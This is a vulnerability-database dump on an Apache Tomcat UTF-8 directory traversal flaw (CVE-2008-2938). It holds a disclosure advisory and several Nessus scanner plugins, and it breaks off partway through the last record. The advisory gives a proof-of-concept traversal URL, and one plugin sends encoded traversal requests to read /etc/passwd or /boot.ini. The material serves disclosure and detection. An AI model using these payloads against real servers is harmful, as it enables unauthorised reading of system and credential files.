{"href": "https://www.seebug.org/vuldb/ssvid-9284", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-08-11T00:00:00", "title": "Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 4.3}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9284", "cvelist": ["CVE-2008-2938"], "description": "No description provided by source.", "viewCount": 17, "published": "2008-08-11T00:00:00", "sourceData": "\n Title: Apache Tomcat Directory Traversal Vulnerability\r\nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)\r\nSeverity: High\r\nImpact: Remote File Disclosure\r\nVulnerable Version: prior to 6.0.18\r\nSolution:\r\n - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)\r\n - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.\r\n - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.\r\nReferences:\r\n - http://tomcat.apache.org/security.html\r\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938\r\nHistory:\r\n - 07.17.2008: Initiate notify (To Apache Security Team)\r\n - 08.02.2008: Responsed this problem fixed and released new version\r\n - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)\r\n - 08.10.2008: Responsed with some suggestions.\r\n\r\nDescription\r\nAs Apache Security Team, this problem occurs because of JAVA side.\r\nIf your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as\r\n'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd)\r\n\r\nExploit\r\nIf your webroot directory has three depth(e.g /usr/local/wwwroot), An\r\nattacker can access arbitrary files as below. (Proof-of-concept)\r\n\r\nhttp://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar\n ", "id": "SSV:9284", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:32:23", "reporter": "Root", "enchantments": {"score": {"value": -0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONF-10445", "ATLASSIAN:CONFSERVER-10445"]}, {"type": "centos", "idList": ["CESA-2008:0648"]}, {"type": "cert", "idList": ["VU:343355"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2007-244", "CPAI-2008-134"]}, {"type": "cve", "idList": ["CVE-2008-2938"]}, {"type": "d2", "idList": ["D2SEC_TOMCAT_UTF8"]}, {"type": "dsquare", "idList": ["E-197"]}, {"type": "exploitdb", "idList": ["EDB-ID:10085", "EDB-ID:6229"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6FCC90F735198D0FCBF891519B34A910", "EXPLOITPACK:E8A3E2892846083A211FCBF12E4E9497"]}, {"type": "fedora", "idList": ["FEDORA:62EF6208DAC", "FEDORA:A50D42E031E", "FEDORA:EC5A9208DCA"]}, {"type": "nessus", "idList": ["4621.PASL", "CENTOS_RHSA-2008-0648.NASL", "FEDORA_2008-7977.NASL", "FEDORA_2008-8113.NASL", "FEDORA_2008-8130.NASL", "MACOSX_SECUPD2008-007.NASL", "MANDRIVA_MDVSA-2008-188.NASL", "ORACLELINUX_ELSA-2008-0648.NASL", "REDHAT-RHSA-2008-0648.NASL", "REDHAT-RHSA-2008-0877.NASL", "REDHAT-RHSA-2008-1007.NASL", "SL_20080827_TOMCAT_ON_SL5_X.NASL", "SUSE9_12232.NASL", "SUSE_11_0_TOMCAT6-080821.NASL", "SUSE_TOMCAT5-5539.NASL", "SUSE_TOMCAT5-5542.NASL", "SUSE_TOMCAT55-5547.NASL", "SUSE_WEBSPHERE-AS_CE-5850.NASL", "TOMCAT_UTF8_DIR_TRAVERSAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:102025", "OPENVAS:1361412562310102025", "OPENVAS:1361412562310103182", "OPENVAS:1361412562310108476", "OPENVAS:1361412562310122558", "OPENVAS:136141256231063412", "OPENVAS:136141256231065122", "OPENVAS:136141256231065836", "OPENVAS:136141256231065854", "OPENVAS:1361412562310830681", "OPENVAS:1361412562310835190", "OPENVAS:1361412562310870028", "OPENVAS:63412", "OPENVAS:64166", "OPENVAS:64167", "OPENVAS:65122", "OPENVAS:65836", "OPENVAS:65854", "OPENVAS:830681", "OPENVAS:835190", "OPENVAS:860209", "OPENVAS:860391", "OPENVAS:860400", "OPENVAS:870028"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0648"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:69010", "PACKETSTORM:74165", "PACKETSTORM:82649", "PACKETSTORM:92240"]}, {"type": "redhat", "idList": ["RHSA-2008:0648", "RHSA-2008:0862", "RHSA-2008:0864", "RHSA-2008:0877", "RHSA-2008:1007"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20328", "SECURITYVULNS:DOC:20499", "SECURITYVULNS:DOC:21057", "SECURITYVULNS:DOC:21130", "SECURITYVULNS:DOC:21199", "SECURITYVULNS:DOC:22760", "SECURITYVULNS:VULN:9193"]}, {"type": "seebug", "idList": ["SSV:12603", "SSV:14334", "SSV:3822", "SSV:65645", "SSV:67058"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2008-2938"]}]}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONF-10445"]}, {"type": "centos", "idList": ["CESA-2008:0648"]}, {"type": "cve", "idList": ["CVE-2008-2938"]}, {"type": "exploitdb", "idList": ["EDB-ID:10085"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6FCC90F735198D0FCBF891519B34A910"]}, {"type": "fedora", "idList": ["FEDORA:EC5A9208DCA"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/TOMCAT_UTF8_TRAVERSAL", "MSF:AUXILIARY/ADMIN/HTTP/TRENDMICRO_DLP_TRAVERSAL"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2008-0648.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310102025", "OPENVAS:136141256231065854", "OPENVAS:860391"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0648"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:74165"]}, {"type": "redhat", "idList": ["RHSA-2008:0648"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21130", "SECURITYVULNS:DOC:22760"]}, {"type": "seebug", "idList": ["SSV:65645"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2008-2938"]}]}, "exploitation": null, "vulnersScore": -0.7}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659907127, "score": 1659907470}, "_internal": {"score_hash": "7ede2f7f6cd6161b45136a5b3db226d8"}}
{"nessus": [{"lastseen": "2023-01-11T14:40:08", "description": "The version of Apache Tomcat running on the remote host is affected by a directory traversal vulnerability due to an issue with the UTF-8 charset implementation within the underlying JVM. An unauthenticated, remote attacker can exploit this, by encoding directory traversal sequences as UTF-8 in a request, to view arbitrary files on the remote host. \n\nNote that successful exploitation requires that a context be configured with 'allowLinking' set to 'true' and the connector with 'URIEncoding' set to 'UTF-8', neither of which is a default setting.", "cvss3": {}, "published": "2008-08-12T00:00:00", "type": "nessus", "title": "Apache Tomcat allowLinking UTF-8 Traversal Arbitrary File Access", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_UTF8_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/33866", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33866);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-2938\");\n script_bugtraq_id(30633);\n\n script_name(english:\"Apache Tomcat allowLinking UTF-8 Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to read a local file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a directory traversal\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat running on the remote host is affected by\na directory traversal vulnerability due to an issue with the UTF-8\ncharset implementation within the underlying JVM. An unauthenticated,\nremote attacker can exploit this, by encoding directory traversal\nsequences as UTF-8 in a request, to view arbitrary files on the remote\nhost. \n\nNote that successful exploitation requires that a context be\nconfigured with 'allowLinking' set to 'true' and the connector with\n'URIEncoding' set to 'UTF-8', neither of which is a default setting.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/495318/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/496168/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/499356/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-6.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-5.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-4.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Tomcat 6.0.18 / 5.5.27 / 4.1.SVN or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"installed_sw/Apache Tomcat\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\ninclude(\"data_protection.inc\");\n\nget_install_count(app_name:\"Apache Tomcat\", exit_if_zero:TRUE);\nport = get_http_port(default:8080);\ninstall = get_single_install(app_name:\"Apache Tomcat\", port:port);\n\n# Try to retrieve a local file.\nos = get_kb_item(\"Host/OS\");\nif (!os) files = make_list(\"/boot.ini\", \"/etc/passwd\");\nelse\n{\n if (\"Windows\" >< os) files = make_list(\"/boot.ini\");\n else files = make_list(\"/etc/passwd\");\n}\n\nforeach file (files)\n{\n traversal = \"/%c0%ae%c0%ae\";\n url = string(crap(data:traversal, length:strlen(traversal)*12), file);\n\n w = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(w)) exit(1, \"the web server did not answer\");\n res = w[2];\n\n # There's a problem if looks like the file.\n if (\n (\"boot.ini\" >< file && \"[boot loader]\" >< res) ||\n (\"/etc/passwd\" >< file && pgrep(pattern:\"root:.*:0:[01]:\", string:res))\n )\n {\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"Nessus was able to retrieve the contents of '\", file, \"' on the\\n\",\n \"remote host by sending the following request :\\n\",\n \"\\n\",\n \" \", build_url(port:port, qs:url), \"\\n\"\n );\n if (report_verbosity > 1)\n {\n res = data_protection::redact_etc_passwd(output:res);\n report = string(\n report,\n \"\\n\",\n \"Here are the contents :\\n\",\n \"\\n\",\n \" \", str_replace(find:'\\n', replace:'\\n ', string:res), \"\\n\"\n );\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"Apache Tomcat\", port, install[\"version\"]);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:40:00", "description": "The version of Apache Tomcat running on the remote host is affected by a directory traversal vulnerability due to an issue with the UTF-8 charset implementation within the underlying JVM. An unauthenticated, remote attacker can exploit this, by encoding directory traversal sequences as UTF-8 in a request, to view arbitrary files on the remote host.\n\nNote that successful exploitation requires that a context be configured with 'allowLinking' set to 'true' and the connector with 'URIEncoding' set to 'UTF-8', neither of which is a default setting.", "cvss3": {}, "published": "2008-08-12T00:00:00", "type": "nessus", "title": "Apache Tomcat 4.1.x < 4.1.38 / 5.5.x < 5.5.27 / 6.0.x < 6.0.18 Linking UTF-8 Traversal Arbitrary File Access", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*"], "id": "4621.PASL", "href": "https://www.tenable.com/plugins/nnm/4621", "sourceData": "Binary data 4621.pasl", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:04:15", "description": "This update of tomcat fixes another directory traversal bug which occurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)", "cvss3": {}, "published": "2009-07-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat6 (tomcat6-161)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat6", "p-cpe:/a:novell:opensuse:tomcat6-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat6-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat6-javadoc", "p-cpe:/a:novell:opensuse:tomcat6-jsp-2_1-api", "p-cpe:/a:novell:opensuse:tomcat6-lib", "p-cpe:/a:novell:opensuse:tomcat6-servlet-2_5-api", "p-cpe:/a:novell:opensuse:tomcat6-webapps", "cpe:/o:novell:opensuse:11.0"], "id": "SUSE_11_0_TOMCAT6-080821.NASL", "href": "https://www.tenable.com/plugins/nessus/40143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update tomcat6-161.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40143);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2938\");\n\n script_name(english:\"openSUSE Security Update : tomcat6 (tomcat6-161)\");\n script_summary(english:\"Check for the tomcat6-161 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of tomcat fixes another directory traversal bug which\noccurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=417217\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat6 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6-jsp-2_1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6-servlet-2_5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-6.0.16-6.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-admin-webapps-6.0.16-6.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-docs-webapp-6.0.16-6.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-javadoc-6.0.16-6.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-jsp-2_1-api-6.0.16-6.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-lib-6.0.16-6.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-servlet-2_5-api-6.0.16-6.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tomcat6-webapps-6.0.16-6.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:11:07", "description": "This update of tomcat fixes another directory traversal bug which occurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE9 Security Update : Tomcat (YOU Patch Number 12232)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12232.NASL", "href": "https://www.tenable.com/plugins/nessus/41238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41238);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2938\");\n\n script_name(english:\"SuSE9 Security Update : Tomcat (YOU Patch Number 12232)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of tomcat fixes another directory traversal bug which\noccurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2938.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12232.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"apache-jakarta-tomcat-connectors-5.0.19-29.16\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"apache2-jakarta-tomcat-connectors-5.0.19-29.16\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"jakarta-tomcat-5.0.19-29.16\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"jakarta-tomcat-doc-5.0.19-29.16\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"jakarta-tomcat-examples-5.0.19-29.16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:41:10", "description": "This update of tomcat fixes another directory traversal bug which occurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)", "cvss3": {}, "published": "2008-09-10T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Tomcat 5 (ZYPP Patch Number 5539)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2938"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_TOMCAT5-5539.NASL", "href": "https://www.tenable.com/plugins/nessus/34154", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34154);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2938\");\n\n script_name(english:\"SuSE 10 Security Update : Tomcat 5 (ZYPP Patch Number 5539)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of tomcat fixes another directory traversal bug which\noccurs when allowLinking and UTF-8 are enabled. (CVE-2008-2938)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2938.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5539.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright 